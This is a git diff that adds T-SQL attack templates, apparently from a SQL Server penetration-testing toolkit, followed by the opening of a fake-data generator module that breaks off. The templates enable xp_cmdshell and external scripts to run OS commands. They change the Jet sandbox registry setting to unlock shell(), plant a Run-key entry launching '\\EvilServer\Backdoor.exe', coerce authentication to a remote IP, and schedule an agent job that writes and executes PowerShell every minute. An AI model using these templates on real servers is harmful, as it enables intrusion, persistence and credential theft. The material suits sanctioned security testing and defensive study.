+sp_dropserver "Access_4" +sp_dropserver "Access_12" + +-- List linked servers +select * from master..sysservers + +-- Look into additional examples for cmd exec +SELECT * FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0','Excel 12.0;Database=C:\windows\temp\test.xls', 'SELECT * FROM [Sheet1$]') +select * from openrowset('SQLOLEDB',';database=C:\Windows\Temp\SystemIdentity.mdb','select shell("cmd.exe /c echo hello > c:\windows\temp\blah.txt")') +select * from openrowset('microsoft.jet.oledb.4.0',';database=C:\Windows\System32\LogFiles\Sum\Current.mdb','select shell("cmd.exe /c echo hello > c:\windows\temp\blah.txt")') +INSERT INTO OPENROWSET ('Microsoft.Jet.OLEDB.4.0', 'Excel 8.0;Database=G:\Test.xls;', 'SELECT * FROM [Sheet1$]') +SELECT * FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0', 'Excel 8.0;Database=C:\testing.xlsx;', 'SELECT Name, Class FROM [Sheet1$]') +SELECT * FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0','Text;Database=C:\Temp\;','SELECT * FROM [Test.csv]') +SELECT * FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0','Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0') +select * FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0','Excel 5.0;HDR=YES;DATABASE=c:\Book1.xls',Sheet1$) +GO + +-- Sample sources +-- https://stackoverflow.com/questions/36987636/cannot-create-an-instance-of-ole-db-provider-microsoft-jet-oledb-4-0-for-linked +-- https://blogs.msdn.microsoft.com/spike/2008/07/23/ole-db-provider-microsoft-jet-oledb-4-0-for-linked-server-null-returned-message-unspecified-error/ + + +-- source: https://www.sqlservercentral.com/Forums/PrintTopic1121430.aspx + +-- Enable show advanced options +sp_configure 'show advanced options',1 +reconfigure +go + +-- Enable ad hoc queries +sp_configure 'ad hoc distributed queries',1 +reconfigure +go + +EXEC sp_MSset_oledb_prop N'Microsoft.ACE.OLEDB.12.0', N'AllowInProcess', 1 +EXEC sp_MSset_oledb_prop N'Microsoft.ACE.OLEDB.12.0', N'DynamicParameters', 1 + +--===== This is an innocent enough setup. +EXEC sp_addlinkedserver 'testsql','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','C:\Windows\Temp\SystemIdentity.mdb'; +go +--===== This verifies the current mode of the Jet engine so we can later verify that we set it back correctly. +EXEC master..xp_regread 'HKEY_LOCAL_MACHINE' ,'Software\Microsoft\Jet\4.0\engines','SandBoxMode'; --Verify that it's a "2" for normal mode +go +--===== This makes it a wee bit more agressive. I'm using xp_rewrite to simulate an attack that can be made via T-SQL + -- using a different method and without "SA" privs which I will not post nor provide a link to. +EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1; --Set a more aggressive mode +EXEC master..xp_regread 'HKEY_LOCAL_MACHINE' ,'Software\Microsoft\Jet\4.0\engines','SandBoxMode'; --Verify that it's a "1" for normal mode +go +--===== This runs a harmless DOS command (DIR) but shows that once the "SandBoxMode" has been changed via a hack, DOS is available + -- through OPENROWSET. +SELECT * FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0',';database=C:\temp\ODBC.mdb','select shell("cmd.exe /c echo hello there c:\ > C:\windows\temp\test123.txt") as blah'); +go +SELECT * FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0',';database=C:\temp\ODBC.mdb','select 1 as blah'); +SELECT * FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0',';database=C:\temp\ODBC.mdb','select ''stringvalue'' as blah'); + +--===== Cleanup +EXEC sp_dropserver 'testsql' --Drops the linked server we created above. +EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',2 --Return to normal mode +EXEC master..xp_regread 'HKEY_LOCAL_MACHINE' ,'Software\Microsoft\Jet\4.0\engines','SandBoxMode' --Verify that it's a "2" for normal mode + diff --git a/templates/tsql/oscmdexec_pythonscript.tsql b/templates/tsql/oscmdexec_pythonscript.tsql new file mode 100644 index 0000000..cef66fe --- /dev/null +++ b/templates/tsql/oscmdexec_pythonscript.tsql @@ -0,0 +1,40 @@ +-- Requirement: Python must be setup during the installation. + +-- Enable advanced options +sp_configure 'show advanced options',1 +reconfigure +go + +-- Enable external scripts +-- Requires a restart of the SQL Server service to take effect +-- User must have "EXECUTE ANY EXTERNAL SCRIPT" privilege +sp_configure 'external scripts enabled',1 +reconfigure WITH OVERRIDE +go + +-- Run OS command via Python +-- Source: https://gist.github.com/james-otten/63389189ee73376268c5eb676946ada5 +exec sp_execute_external_script +@language =N'Python', +@script=N'import subprocess +p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) +OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])' +WITH RESULT SETS (([cmd_out] nvarchar(max))) + +-- Get Python version +-- Source: https://gist.github.com/james-otten/63389189ee73376268c5eb676946ada5 +exec sp_execute_external_script +@language =N'Python', +@script=N'import sys +OutputDataSet = pandas.DataFrame([sys.version])' +WITH RESULT SETS ((python_version nvarchar(max))) + +-- Disable external scripts +sp_configure 'external scripts enabled',0 +reconfigure +go + +-- Disable advanced options +sp_configure 'show advanced options',0 +reconfigure +go diff --git a/templates/tsql/oscmdexec_rscript.sql b/templates/tsql/oscmdexec_rscript.sql new file mode 100644 index 0000000..2851a61 --- /dev/null +++ b/templates/tsql/oscmdexec_rscript.sql @@ -0,0 +1,30 @@ +-- Requirement: R must be setup during the installation. + +-- Enable advanced options +sp_configure 'show advanced options',1 +reconfigure +go + +-- Enable external scripts +-- Requires a restart of the SQL Server service to take effect +-- User must have "EXECUTE ANY EXTERNAL SCRIPT" privilege +sp_configure 'external scripts enabled',1 +reconfigure WITH OVERRIDE +go + +EXEC sp_execute_external_script + @language=N'R', + @script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))' + WITH RESULT SETS (([cmd_out] text)); +GO + +-- Disable external scripts +-- Requires a restart of the SQL Server service to take effect +sp_configure 'external scripts enabled',0 +reconfigure WITH OVERRIDE +go + +-- Disable advanced options +sp_configure 'show advanced options',0 +reconfigure +go diff --git a/templates/tsql/oscmdexec_xpcmdshell.sql b/templates/tsql/oscmdexec_xpcmdshell.sql new file mode 100644 index 0000000..7064fa6 --- /dev/null +++ b/templates/tsql/oscmdexec_xpcmdshell.sql @@ -0,0 +1,17 @@ + +-- Re install +sp_addextendedproc 'xp_cmdshell', 'xplog70.dll' + + +-- re enable +EXEC sp_configure 'show advanced options', 1; +RECONFIGURE; +GO + +EXEC sp_configure 'xp_cmdshell', 1; +RECONFIGURE; +GO + + +-- run +Exec master..xp_cmdshell 'whoami' diff --git a/templates/tsql/oscmdexec_xpcmdshell_proxy.sql b/templates/tsql/oscmdexec_xpcmdshell_proxy.sql new file mode 100644 index 0000000..9e73c80 --- /dev/null +++ b/templates/tsql/oscmdexec_xpcmdshell_proxy.sql @@ -0,0 +1,42 @@ +-- Summary +-- Create a SQL Server login that maps to a database user/role +-- that has been given explicit privs to execute xp_cmdshell +-- once the xp_proxy_account has been configured with valid windows credentials +-- ooook then + +USE MASTER; +GO + +-- enable xp_cmdshell on the server +sp_configure 'show advanced options',1 +reconfigure +go + +sp_configure 'xp_cmdshell',1 +reconfigure +go + +-- Create login from windows user +CREATE LOGIN [SQLServer1\User1] FROM WINDOWS; + +-- Create xp_cmdshell_proxy +EXEC sp_xp_cmdshell_proxy_account 'SQLServer1\User1', 'Password!'; + +-- Create database role +CREATE ROLE [CmdShell_Executor] AUTHORIZATION [dbo] + +-- Grant role privs to execute xp_cmdshell using proxy +GRANT EXEC ON xp_cmdshell TO [CmdShell_Executor] + +-- Create a database user +CREATE USER [user1] FROM LOGIN [user1]; + +-- Add database user to the role +EXEC sp_addrolemember [CmdShell_Executor],[user1]; + +-- Grant user1 database user privs to execute xp_cmdshell using proxy directly +GRANT EXEC ON xp_cmdshell TO [user1] + + +-- Login as user1 - will show SQLServere1\User1 instead of service account +xp_cmdshell 'whoami' diff --git a/templates/tsql/persist_reg_run.tsql b/templates/tsql/persist_reg_run.tsql new file mode 100644 index 0000000..a2625bb --- /dev/null +++ b/templates/tsql/persist_reg_run.tsql @@ -0,0 +1,10 @@ +--------------------------------------------- +-- Use SQL Server xp_regwrite to configure +-- a file to run via UNC Path when users login +---------------------------------------------- +EXEC master..xp_regwrite +@rootkey = 'HKEY_LOCAL_MACHINE', +@key = 'Software\Microsoft\Windows\CurrentVersion\Run', +@value_name = 'EvilSauce', +@type = 'REG_SZ', +@value = '"\\EvilServer\Backdoor.exe"' diff --git a/templates/tsql/readfile_BulkInsert.sql b/templates/tsql/readfile_BulkInsert.sql new file mode 100644 index 0000000..38c3cde --- /dev/null +++ b/templates/tsql/readfile_BulkInsert.sql @@ -0,0 +1,35 @@ +-- Option 1 - local file +-- Create temp table +CREATE TABLE #file (content nvarchar(4000)); + +-- Read file into temp table +BULK INSERT #file FROM 'c:\temp\file.txt'; + +-- Select contents of file +SELECT content FROM #file + +-- Option 2 - file via unc path +-- Create temp table +CREATE TABLE #file (content nvarchar(4000)); + +-- Read file into temp table +BULK INSERT #file FROM '\\127.0.0.1\c$\temp\file.txt'; + +-- Select contents of file +SELECT content FROM #file + +-- Drop temp table +DROP TABLE #file + +-- Option 3 - file via webdav path +-- Create temp table +CREATE TABLE #file (content nvarchar(4000)); + +-- Read file into temp table +BULK INSERT #file FROM '\\sharepoint.acme.com@SSL\Path\to\file.txt'; + +-- Select contents of file +SELECT content FROM #file + +-- Drop temp table +DROP TABLE #file diff --git a/templates/tsql/readfile_OpenDataSourceTxt.sql b/templates/tsql/readfile_OpenDataSourceTxt.sql new file mode 100644 index 0000000..7fde942 --- /dev/null +++ b/templates/tsql/readfile_OpenDataSourceTxt.sql @@ -0,0 +1,20 @@ +-- Note: Requires the driver to be installed ahead of time. + +-- Enable show advanced options +sp_configure 'show advanced options',1 +reconfigure +go + +-- Enable ad hoc queries +sp_configure 'ad hoc distributed queries',1 +reconfigure +go + +-- list available providers +EXEC sp_MSset_oledb_prop + +-- Read a text file +SELECT * FROM OpenDataSource( 'Microsoft.ACE.OLEDB.12.0','Data Source="c:\temp";Extended properties="Text;hdr=no"')...file#txt + +-- Note: This also works with unc paths \\ip\file.txt +-- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind. diff --git a/templates/tsql/readfile_OpenDataSourceXlsx b/templates/tsql/readfile_OpenDataSourceXlsx new file mode 100644 index 0000000..db9d160 --- /dev/null +++ b/templates/tsql/readfile_OpenDataSourceXlsx @@ -0,0 +1,20 @@ +-- Note: Requires the driver to be installed ahead of time. + +-- Enable show advanced options +sp_configure 'show advanced options',1 +reconfigure +go + +-- Enable ad hoc queries +sp_configure 'ad hoc distributed queries',1 +reconfigure +go + +-- list available providers +EXEC sp_MSset_oledb_prop + +-- Read text file +SELECT * FROM OPENDATASOURCE('Microsoft.ACE.OLEDB.12.0','Data Source=C:\windows\temp\Book1.xlsx;Extended Properties=Excel 8.0')...[Targets$] + +-- Note: This also works with unc paths \\ip\file.txt +-- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind. diff --git a/templates/tsql/readfile_OpenRowSetBulk.sql b/templates/tsql/readfile_OpenRowSetBulk.sql new file mode 100644 index 0000000..4556afb --- /dev/null +++ b/templates/tsql/readfile_OpenRowSetBulk.sql @@ -0,0 +1,19 @@ +-- select the contents of a file using openrowset +-- note: ad-hoc queries have to be enabled +-- https://docs.microsoft.com/en-us/sql/t-sql/functions/openrowset-transact-sql + +-- Enable show advanced options +sp_configure 'show advanced options',1 +reconfigure +go + +-- Enable ad hoc queries +sp_configure 'ad hoc distributed queries',1 +reconfigure +go + +-- Read text file +SELECT cast(BulkColumn as varchar(max)) as Document FROM OPENROWSET(BULK N'C:\windows\temp\blah.txt', SINGLE_BLOB) AS Document + +-- Note: This also works with unc paths \\ip\file.txt +-- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind. diff --git a/templates/tsql/readfile_OpenRowSetTxt.sql b/templates/tsql/readfile_OpenRowSetTxt.sql new file mode 100644 index 0000000..3d19d20 --- /dev/null +++ b/templates/tsql/readfile_OpenRowSetTxt.sql @@ -0,0 +1,23 @@ +-- Note: Requires the driver to be installed ahead of time. +-- EXEC sp_MSset_oledb_prop N'Microsoft.ACE.OLEDB.12.0', N'AllowInProcess', 1 -- not required +-- EXEC sp_MSset_oledb_prop N'Microsoft.ACE.OLEDB.12.0', N'DynamicParameters', 1 -- not required +-- EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1; -- not required + +-- list available providers +EXEC sp_MSset_oledb_prop -- get available providers + +-- Enable show advanced options +sp_configure 'show advanced options',1 +reconfigure +go + +-- Enable ad hoc queries +sp_configure 'ad hoc distributed queries',1 +reconfigure +go + +-- Read text file +SELECT * FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0','Text;Database=c:\temp\;HDR=Yes;FORMAT=text', 'SELECT * FROM [file.txt]') + +-- Note: This also works with unc paths \\ip\file.txt +-- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind. diff --git a/templates/tsql/readfile_OpenRowSetXlsx.sql b/templates/tsql/readfile_OpenRowSetXlsx.sql new file mode 100644 index 0000000..2fb5f23 --- /dev/null +++ b/templates/tsql/readfile_OpenRowSetXlsx.sql @@ -0,0 +1,23 @@ + +-- Requires the driver be installed ahead of time. + +-- list available providers +EXEC sp_MSset_oledb_prop -- get available providers + +-- Enable show advanced options +sp_configure 'show advanced options',1 +reconfigure +go + +-- Enable ad hoc queries +sp_configure 'ad hoc distributed queries',1 +reconfigure +go + +-- Read text file from disk +SELECT column1 FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0', 'Excel 12.0;Database=C:\windows\temp\Book1.xlsx;', 'SELECT * FROM [Targets$]') + +-- Read text file from unc path +SELECT column1 FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0', 'Excel 12.0;Database=\\server\folder\Book1.xlsx;', 'SELECT * FROM [Targets$]') + +-- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind. diff --git a/templates/tsql/restore-unc-injection.xmla b/templates/tsql/restore-unc-injection.xmla new file mode 100644 index 0000000..4096e4c --- /dev/null +++ b/templates/tsql/restore-unc-injection.xmla @@ -0,0 +1,7 @@ +# Reference: https://github.com/p0dalirius/MSSQL-Analysis-Coerce + + + \\192.168.1.12\SYSVOL\db.abf + \\192.168.1.12\SYSVOL\db.abf + \\192.168.1.12\SYSVOL\db.abf + diff --git a/templates/tsql/writefile_OpenRowSetTxt.sql b/templates/tsql/writefile_OpenRowSetTxt.sql new file mode 100644 index 0000000..68b9af8 --- /dev/null +++ b/templates/tsql/writefile_OpenRowSetTxt.sql @@ -0,0 +1,21 @@ + +-- Note: Requires the driver to be installed ahead of time. + +-- list available providers +EXEC sp_MSset_oledb_prop -- get available providers + +-- Enable show advanced options +sp_configure 'show advanced options',1 +reconfigure +go + +-- Enable ad hoc queries +sp_configure 'ad hoc distributed queries',1 +reconfigure +go +-- Write text file +INSERT INTO OPENROWSET('Microsoft.ACE.OLEDB.12.0','Text;Database=c:\temp\;HDR=Yes;FORMAT=text', 'SELECT * FROM [file.txt]') +SELECT @@version + +-- Note: This also works with unc paths \\ip\file.txt +-- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind. diff --git a/templates/tsql/writefile_bcpxpcmdshell.sql b/templates/tsql/writefile_bcpxpcmdshell.sql new file mode 100644 index 0000000..9cdd19e --- /dev/null +++ b/templates/tsql/writefile_bcpxpcmdshell.sql @@ -0,0 +1,69 @@ +--------------------------------------- +-- Script: writefile_bcpxpcmdshell.sql +-- Author/Modifications: Scott Sutherland +-- Based on https://www.simple-talk.com/sql/t-sql-programming/the-tsql-of-text-files/ +-- Description: +-- Write PowerShell code to disk and run it using bcp and xp_cmdshell. +--------------------------------------- + +-- Enable xp_cmdshell +sp_configure 'show advanced options',1 +RECONFIGURE +GO + +sp_configure 'xp_cmdshell',1 +RECONFIGURE +GO + +-- Create variables +DECLARE @MyPowerShellCode NVARCHAR(MAX) +DECLARE @PsFileName NVARCHAR(4000) +DECLARE @TargetDirectory NVARCHAR(4000) +DECLARE @PsFilePath NVARCHAR(4000) +DECLARE @MyGlobalTempTable NVARCHAR(4000) +DECLARE @Command NVARCHAR(4000) + +-- Set filename for PowerShell script +Set @PsFileName = 'MyPowerShellScript.ps1' + +-- Set target directory for PowerShell script to be written to +SELECT @TargetDirectory = REPLACE(CAST((SELECT SERVERPROPERTY('ErrorLogFileName')) as VARCHAR(MAX)),'ERRORLOG','') + +-- Create full output path for creating the PowerShell script +SELECT @PsFilePath = @TargetDirectory + @PsFileName +SELECT @PsFilePath as PsFilePath + +-- Define the PowerShell code +SET @MyPowerShellCode = 'Write-Output "hello world" | Out-File "' + @TargetDirectory + 'intendedoutput.txt"' +SELECT @MyPowerShellCode as PsScriptCode + +-- Create a global temp table with a unique name using dynamic SQL +SELECT @MyGlobalTempTable = '##temp' + CONVERT(VARCHAR(12), CONVERT(INT, RAND() * 1000000)) + +-- Create a command to insert the PowerShell code stored in the @MyPowerShellCode variable, into the global temp table +SELECT @Command = ' + CREATE TABLE [' + @MyGlobalTempTable + '](MyID int identity(1,1), PsCode varchar(MAX)) + INSERT INTO [' + @MyGlobalTempTable + '](PsCode) + SELECT @MyPowerShellCode' + +-- Execute that command +EXECUTE sp_ExecuteSQL @command, N'@MyPowerShellCode varchar(MAX)', @MyPowerShellCode + +-- Execute bcp via xp_cmdshell (as the service account) to save the contents of the temp table to MyPowerShellScript.ps1 +SELECT @Command = 'bcp "SELECT PsCode from [' + @MyGlobalTempTable + ']' + '" queryout "'+ @PsFilePath + '" -c -T -S ' + @@SERVERNAME + +-- Write the file +EXECUTE MASTER..xp_cmdshell @command, NO_OUTPUT + +-- Drop the global temp table +EXECUTE ( 'Drop table ' + @MyGlobalTempTable ) + +-- Run the PowerShell script +DECLARE @runcmdps nvarchar(4000) +SET @runcmdps = 'Powershell -C "$x = gc '''+ @PsFilePath + ''';iex($X)"' +EXECUTE MASTER..xp_cmdshell @runcmdps, NO_OUTPUT + +-- Delete the PowerShell script +DECLARE @runcmddel nvarchar(4000) +SET @runcmddel= 'DEL /Q "' + @PsFilePath +'"' +-- EXECUTE MASTER..xp_cmdshell @runcmddel, NO_OUTPUT diff --git a/templates/tsql/writefile_bcpxpcmdshell_Job.sql b/templates/tsql/writefile_bcpxpcmdshell_Job.sql new file mode 100644 index 0000000..9678063 --- /dev/null +++ b/templates/tsql/writefile_bcpxpcmdshell_Job.sql @@ -0,0 +1,142 @@ +-- Create the job, run the job every minute +-- TSQL: create powershell script that outputs file to log directory, run powershell script +-- This is just a template. + +USE [msdb] +GO + +BEGIN TRANSACTION +DECLARE @ReturnCode INT +SELECT @ReturnCode = 0 + +IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name=N'[Uncategorized (Local)]' AND category_class=1) +BEGIN +EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL', @name=N'[Uncategorized (Local)]' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + +END + +DECLARE @jobId BINARY(16) +EXEC @ReturnCode = msdb.dbo.sp_add_job @job_name=N'RunMyPowerShellJob', + @enabled=1, + @notify_level_eventlog=0, + @notify_level_email=0, + @notify_level_netsend=0, + @notify_level_page=0, + @delete_level=0, + @description=N'No description available.', + @category_name=N'[Uncategorized (Local)]', + @owner_login_name=N'sa', @job_id = @jobId OUTPUT +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + +EXEC @ReturnCode = msdb.dbo.sp_add_jobstep @job_id=@jobId, @step_name=N'RunPowerShellJobStep', + @step_id=1, + @cmdexec_success_code=0, + @on_success_action=1, + @on_success_step_id=0, + @on_fail_action=2, + @on_fail_step_id=0, + @retry_attempts=0, + @retry_interval=0, + @os_run_priority=0, @subsystem=N'TSQL', + @command=N'--------------------------------------- +-- Script: writefile_bcpxpcmdshell.sql +-- Author/Modifications: Scott Sutherland +-- Based on https://www.simple-talk.com/sql/t-sql-programming/the-tsql-of-text-files/ +-- Description: +-- Write PowerShell code to disk and run it using bcp and xp_cmdshell. +--------------------------------------- + +-- Enable xp_cmdshell +sp_configure ''show advanced options'',1 +RECONFIGURE +GO + +sp_configure ''xp_cmdshell'',1 +RECONFIGURE +GO + +-- Create variables +DECLARE @MyPowerShellCode NVARCHAR(MAX) +DECLARE @PsFileName NVARCHAR(4000) +DECLARE @TargetDirectory NVARCHAR(4000) +DECLARE @PsFilePath NVARCHAR(4000) +DECLARE @MyGlobalTempTable NVARCHAR(4000) +DECLARE @Command NVARCHAR(4000) + +-- Set filename for PowerShell script +Set @PsFileName = ''MyPowerShellScript.ps1'' + +-- Set target directory for PowerShell script to be written to +SELECT @TargetDirectory = REPLACE(CAST((SELECT SERVERPROPERTY(''ErrorLogFileName'')) as VARCHAR(MAX)),''ERRORLOG'','''') + +-- Create full output path for creating the PowerShell script +SELECT @PsFilePath = @TargetDirectory + @PsFileName +SELECT @PsFilePath as PsFilePath + +-- Define the PowerShell code +SET @MyPowerShellCode = ''Write-Output "hello world" | Out-File "'' + @TargetDirectory + ''intendedoutput.txt"'' +SELECT @MyPowerShellCode as PsScriptCode + +-- Create a global temp table with a unique name using dynamic SQL +SELECT @MyGlobalTempTable = ''##temp'' + CONVERT(VARCHAR(12), CONVERT(INT, RAND() * 1000000)) + +-- Create a command to insert the PowerShell code stored in the @MyPowerShellCode variable, into the global temp table +SELECT @Command = '' + CREATE TABLE ['' + @MyGlobalTempTable + ''](MyID int identity(1,1), PsCode varchar(MAX)) + INSERT INTO ['' + @MyGlobalTempTable + ''](PsCode) + SELECT @MyPowerShellCode'' + +-- Execute that command +EXECUTE sp_ExecuteSQL @command, N''@MyPowerShellCode varchar(MAX)'', @MyPowerShellCode + +-- Add delay for lab race condition - Change as needed +WAITFOR DELAY ''00:00:5'' + +-- Execute bcp via xp_cmdshell (as the service account) to save the contents of the temp table to MyPowerShellScript.ps1 +SELECT @Command = ''bcp "SELECT PsCode from ['' + @MyGlobalTempTable + '']'' + ''" queryout "''+ @PsFilePath + ''" -c -T -S '' + @@SERVERNAME + +-- Write the file +EXECUTE MASTER..xp_cmdshell @command, NO_OUTPUT + +-- Drop the global temp table +EXECUTE ( ''Drop table '' + @MyGlobalTempTable ) + +-- Run the PowerShell script +DECLARE @runcmdps nvarchar(4000) +SET @runcmdps = ''Powershell -C "$x = gc ''''''+ @PsFilePath + '''''';iex($X)"'' +EXECUTE MASTER..xp_cmdshell @runcmdps, NO_OUTPUT + +-- Delete the PowerShell script +DECLARE @runcmddel nvarchar(4000) +SET @runcmddel= ''DEL /Q "'' + @PsFilePath +''"'' +EXECUTE MASTER..xp_cmdshell @runcmddel, NO_OUTPUT +', + @database_name=N'master', + @flags=0 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_update_job @job_id = @jobId, @start_step_id = 1 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobschedule @job_id=@jobId, @name=N'RunPsJobEveryMinute', + @enabled=1, + @freq_type=4, + @freq_interval=1, + @freq_subday_type=4, + @freq_subday_interval=1, + @freq_relative_interval=0, + @freq_recurrence_factor=0, + @active_start_date=20191105, + @active_end_date=99991231, + @active_start_time=0, + @active_end_time=235959, + @schedule_uid=N'6c1e63cf-1a5b-4fe4-a271-7aa247b50c73' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobserver @job_id = @jobId, @server_name = N'(local)' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +COMMIT TRANSACTION +GOTO EndSave +QuitWithRollback: + IF (@@TRANCOUNT > 0) ROLLBACK TRANSACTION +EndSave: + +GO diff --git a/templates/tsql/writefile_bulkinsert.sql b/templates/tsql/writefile_bulkinsert.sql new file mode 100644 index 0000000..2091820 --- /dev/null +++ b/templates/tsql/writefile_bulkinsert.sql @@ -0,0 +1,17 @@ +-- author: antti rantassari, 2017 +-- Description: Copy file contents to another file via local, unc, or webdav path +-- summary = file contains varchar data, field is an int, throws casting error on read, set error output to file, tada! +-- requires sysadmin or bulk insert privs + +create table #errortable (ignore int) + +bulk insert #errortable +from '\\localhost\c$\windows\win.ini' -- or 'c:\windows\system32\win.ni' -- or \\hostanme@SSL\folder\file.ini' +with +( +fieldterminator=',', +rowterminator='\n', +errorfile='c:\windows\temp\thatjusthappend.txt' +) + +drop table #errortable diff --git a/tests/Create-FakeSensitiveData.psm1 b/tests/Create-FakeSensitiveData.psm1 new file mode 100644 index 0000000..afaa46c --- /dev/null +++ b/tests/Create-FakeSensitiveData.psm1 @@ -0,0 +1,109706 @@ +Function Create-FakeSensitiveData +{ + <# + .SYNOPSIS + This function can be used to generate fake data set for developers to use. + The script can: + - Output a data object + - Output to a csv file + - Output to a target SQL Server. This requires sysadmin privileges and will create a database. + + .PARAMETER Rowcount + Number of rows to generate. The default is 1. + .PARAMETER SuppressOutput + By default, the function will return generated data in a data table, + but this can be used to suppress that when using outputs to files or databases. + .PARAMETER OutCsvFile + If provided, this will output the generated rows to a csv file. + .PARAMETER SQLInstance + If provided, this will define the SQL Server instance to create the database in. + .PARAMETER SQLLogin + If provided, this will define the SQL Server login used to authenticate to the provide instance. + .PARAMETER SQLPassword + If provided, this will define the SQL Server password used to authenticate to the provide instance. + .PARAMETER DatabaseName + If provided, this will define the name of the SQL Server database created on the target instance. It is random by default. + .PARAMETER TableName + If provided, this will define the name of the SQL Server table created on the target instance. It is random by default. + .EXAMPLE + Create-FakeSensitiveData -Verbose + .EXAMPLE + Create-FakeSensitiveData -Verbose -RowCount 2 + .EXAMPLE + Create-FakeSensitiveData -Verbose -RowCount 2 -OutCscFile 'c:\temp\data.csv' -SuppressOutput + .EXAMPLE + Create-FakeSensitiveData -Verbose -RowCount 2 -SQLInstance 'server\instance' -SQLLogin 'sa' -SQLPassword 'Sup3rS3cur3Pasw0rd!' -Database 'FakeData' -SuppressOutput + .NOTES + Author: Scott Sutherland (@_nullbind), NetSPI 2023 + Version: 1.0 + #> + param ( + [Parameter(Mandatory = $false, + HelpMessage = 'Number of rows to generate. The default is 1.')] + [int]$RowCount = 1, + [Parameter(Mandatory = $false, + HelpMessage = 'By default, the function will return generated data in a data table,but this can be used to suppress that when using outputs to files or databases.')] + [switch]$SuppressOutput, + [Parameter(Mandatory = $false, + HelpMessage = 'If provided, this will output the generated rows to a csv file.')] + [string]$OutCsvFile, + [Parameter(Mandatory = $false, + HelpMessage = 'If provided, this will define the SQL Server instance to create the database in.')] + [string]$SQLInstance, + [Parameter(Mandatory = $false, + HelpMessage = 'If provided, this will define the SQL Server login used to authenticate to the provide instance.')] + [string]$SQLLogin, + [Parameter(Mandatory = $false, + HelpMessage = 'If provided, this will define the SQL Server password used to authenticate to the provide instance.')] + [string]$SQLPassword, + [Parameter(Mandatory = $false, + HelpMessage = ' If provided, this will define the name of the SQL Server database created on the target instance. It is random by default.')] + [string]$DatabaseName, + [Parameter(Mandatory = $false, + HelpMessage = ' If provided, this will define the name of the SQL Server table created on the target instance. It is random by default.')] + [string]$TableName + ) + + begin { + + #region Define Data Sets + # ------------------------------------------------------ + # Define data sets + # ------------------------------------------------------ + + Write-Verbose "Loading sample datasets" + + # Define first name list + # author: nullbind + $FirstNames = "Albert","Alex","Alexander","Alfred","Allen","Andrew","Archie","Arthur","August","Ben","Benjamin","Bernard","Bert","Calvin","Carl","Charles","Charley","Charlie","Chester","Clarence","Claude","Clyde","Dan","Daniel","David","Earl","Ed","Edgar","Edward","Edwin","Elmer","Ernest","Eugene","Floyd","Francis","Frank","Fred","Frederick","George","Guy","Harry","Harvey","Henry","Herbert","Herman","Homer","Horace","Howard","Hugh","Ira","Isaac","Jack","Jacob","James","Jerry","Jesse","Jessie","Jim","Joe","John","Joseph","Julius","Lawrence","Lee","Leo","Leonard","Lewis","Louis","Luther","Marion","Martin","Michael","Milton","Oliver","Oscar","Otto","Patrick","Paul","Peter","Philip","Ralph","Ray","Raymond","Richard","Robert","Roy","Rufus","Sam","Samuel","Sidney","Stephen","Theodore","Thomas","Tom","Walter","Warren","Will","William","Willie","Willis" + + # Define last name list + # author: nullbind + $LastNames = 